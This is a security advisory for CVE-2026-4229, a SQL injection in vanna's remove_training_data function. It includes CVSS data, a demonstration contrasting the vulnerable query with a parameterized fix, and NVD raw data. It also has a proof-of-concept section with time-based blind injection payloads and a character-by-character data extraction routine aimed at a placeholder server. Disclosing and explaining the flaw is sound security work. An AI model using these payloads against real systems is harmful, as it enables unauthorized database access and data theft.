Security Vulnerability Report
CVE-2026-4229 CVSS 7.3 HIGH

Published: 2026-03-16 14:20:16
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in vanna-ai vanna up to and including version 2.0.2. It affects the function remove_training_data in the file src/vanna/legacy/google/bigquery_vector.py: manipulation of the argument ID leads to SQL injection (CWE-89, with CWE-74 also recorded). The attack can be initiated remotely. An exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
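The injection the description refers to is the classic CWE-89 pattern: a DELETE statement assembled by interpolating the caller-supplied id into the SQL text. The block below is an added example, not code from vanna or from the advisory. It uses an in-memory sqlite3 table as a stand-in for the BigQuery training-data table so that it runs offline (the columns, rows, malicious id value, function names and the identifier allowlist patterns are all this example's own constructions), and it shows three things: the interpolated form deleting every row when the id is `x' OR '1'='1`, the bound-parameter form deleting nothing for the same id, and the shape of a parameterized BigQuery DELETE that carries the id as an `@id` parameter rather than as text.

```python
import re
import sqlite3

# Constructed sample rows standing in for the vector store's training table
# (columns and values invented for this example).
TRAINING_ROWS = [
    ("a1b2-sql", "sql", "SELECT count(*) FROM orders"),
    ("c3d4-ddl", "ddl", "CREATE TABLE orders (id INT64)"),
    ("e5f6-doc", "documentation", "orders holds one row per purchase"),
]

# Attacker-controlled id: the quote closes the string literal and the OR
# clause makes the WHERE predicate true for every row.
MALICIOUS_ID = "x' OR '1'='1"

# Identifiers (project, dataset, table) cannot be bound as query parameters,
# so they are checked against an allowlist before being interpolated.
# Patterns are this example's assumption: project ids may contain hyphens,
# dataset and table names are restricted to letters, digits and underscores.
PROJECT_RE = re.compile(r"^[a-z][a-z0-9-]{4,28}[a-z0-9]$")
NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,1024}$")


def make_store():
    """In-memory sqlite3 stand-in for the BigQuery table; runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE training_data (id TEXT, training_data_type TEXT, content TEXT)"
    )
    conn.executemany("INSERT INTO training_data VALUES (?, ?, ?)", TRAINING_ROWS)
    conn.commit()
    return conn


def remove_training_data_vulnerable(conn, id):
    """DELETE built by interpolating the caller's id: the CWE-89 pattern."""
    query = f"DELETE FROM training_data WHERE id = '{id}'"
    cur = conn.execute(query)
    conn.commit()
    return cur.rowcount  # rows actually deleted


def remove_training_data_fixed(conn, id):
    """DELETE with id as a bound parameter: it can only ever match a value."""
    cur = conn.execute("DELETE FROM training_data WHERE id = ?", (id,))
    conn.commit()
    return cur.rowcount


def remaining_ids(conn):
    return [row[0] for row in conn.execute("SELECT id FROM training_data ORDER BY id")]


def bigquery_delete_statement(project_id, dataset_name, table_name, id):
    """Parameterized DELETE in BigQuery's dialect, returned as (sql, params).

    params is a list of (name, type, value) triples in the shape of
    google.cloud.bigquery.ScalarQueryParameter; the id never enters the SQL
    text, so a quote inside it has nothing to close.
    """
    if not PROJECT_RE.match(project_id):
        raise ValueError(f"invalid project id: {project_id!r}")
    for name in (dataset_name, table_name):
        if not NAME_RE.match(name):
            raise ValueError(f"invalid dataset/table name: {name!r}")
    sql = f"DELETE FROM `{project_id}.{dataset_name}.{table_name}` WHERE id = @id"
    return sql, [("id", "STRING", id)]


def demo():
    """Runs the malicious id through both forms and reports what survived."""
    vuln = make_store()
    vuln_deleted = remove_training_data_vulnerable(vuln, MALICIOUS_ID)
    fixed = make_store()
    fixed_deleted = remove_training_data_fixed(fixed, MALICIOUS_ID)
    return {
        "vulnerable_deleted": vuln_deleted,
        "vulnerable_remaining": remaining_ids(vuln),
        "fixed_deleted": fixed_deleted,
        "fixed_remaining": remaining_ids(fixed),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
    sql, params = bigquery_delete_statement(
        "my-project", "vanna", "training_data", MALICIOUS_ID
    )
    print(sql, params)
```

With the real client, the (sql, params) pair maps onto `bigquery.QueryJobConfig(query_parameters=[bigquery.ScalarQueryParameter("id", "STRING", id)])` handed to `client.query(sql, job_config=...)`. Project, dataset and table names cannot be bound as parameters, which is why the example validates them against an allowlist before interpolating them; that check is a separate concern from the id injection the advisory describes, but the same function typically interpolates both.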

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

The 3.1 score above is the primary metric in the NVD entry. The entry also records two secondary scores: CVSS 4.0 base 5.5 MEDIUM (exploit maturity Proof-of-Concept), vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X, and CVSS 2.0 base 7.5 HIGH, vector AV:N/AC:L/Au:N/C:P/I:P/A:P.

Configurations (Affected Products)

NVD provides no CPE configuration data for this entry; the affected range stated in the description is:

vanna-ai vanna <= 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-4229 SQL Injection PoC for vanna-ai vanna
# Target: vanna-ai vanna <= 2.0.2
# Endpoint: remove_training_data function in bigquery_vector.py
#
# Caveat: the advisory names a Python function, not an HTTP route. The URL
# below is this PoC's own assumption about how a deployment exposes that
# function. The payloads use MySQL-style SLEEP()/SUBSTRING(); BigQuery has
# no SLEEP() function, so they illustrate the time-based technique rather
# than something that will delay a BigQuery-backed target as written.
TARGET_URL = "http://target-server/api/remove_training"

# Malicious payload for SQL injection
# Using time-based blind SQL injection technique
payload = {
    "id": "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
}


def exploit_sql_injection():
    """
    Exploit SQL injection in vanna-ai remove_training_data function.
    This PoC demonstrates time-based blind SQL injection.
    """
    try:
        print("[*] Sending malicious request...")
        print(f"[*] Target: {TARGET_URL}")
        print(f"[*] Payload: {payload}")
        response = requests.post(TARGET_URL, json=payload, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text}")
        return response
    except requests.exceptions.Timeout:
        print("[+] SQL Injection confirmed! Request timed out as expected.")
        return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def extract_data_blind(sql_query):
    """
    Extract data using time-based blind SQL injection.
    Example: extract the database version.
    """
    # Character-by-character extraction using binary search over the
    # printable ASCII range 32..126.
    extracted = ""
    for pos in range(1, 50):
        low = 32
        high = 126
        while low <= high:
            mid = (low + high) // 2
            probe = {
                "id": f"1' AND (SELECT CASE WHEN (ASCII(SUBSTRING(({sql_query}),{pos},1))>{mid}) THEN SLEEP(2) ELSE 0 END) AND '1'='1"
            }
            # Reset on every probe; otherwise a stale response from the
            # previous iteration would be reused after a timeout.
            response = None
            try:
                response = requests.post(TARGET_URL, json=probe, timeout=5)
            except requests.exceptions.RequestException:
                pass
            # A timeout (response still None) means the condition held,
            # i.e. the character is greater than mid.
            if response is None:
                low = mid + 1
            else:
                high = mid - 1
        # The search ends with low == high + 1 and low equal to the
        # character's code. If no probe ever delayed, the character is
        # <= 32 (end of string or non-printable): stop.
        if high < 32:
            break
        extracted += chr(low)
        print(f"[*] Extracted so far: {extracted}")
    return extracted


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-4229 SQL Injection PoC")
    print("vanna-ai vanna <= 2.0.2")
    print("=" * 60)
    exploit_sql_injection()

References

https://gist.github.com/YLChen-007/b4f326eaecc29b192cf93dc5d6bc0623
https://vuldb.com/?ctiid.351152
https://vuldb.com/?id.351152
https://vuldb.com/?submit.771214

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4229", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:16.277", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in vanna-ai vanna up to 2.0.2. This impacts the function remove_training_data of the file src/vanna/legacy/google/bigquery_vector.py. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en vanna-ai vanna hasta la versión 2.0.2. Esto afecta a la función remove_training_data del archivo src/vanna/legacy/google/bigquery_vector.py. Esta manipulación del argumento ID causa inyección SQL. El ataque puede iniciarse de forma remota. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/b4f326eaecc29b192cf93dc5d6bc0623", "source": "[email protected]"}, {"url": 
"https://vuldb.com/?ctiid.351152", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351152", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771214", "source": "[email protected]"}]}}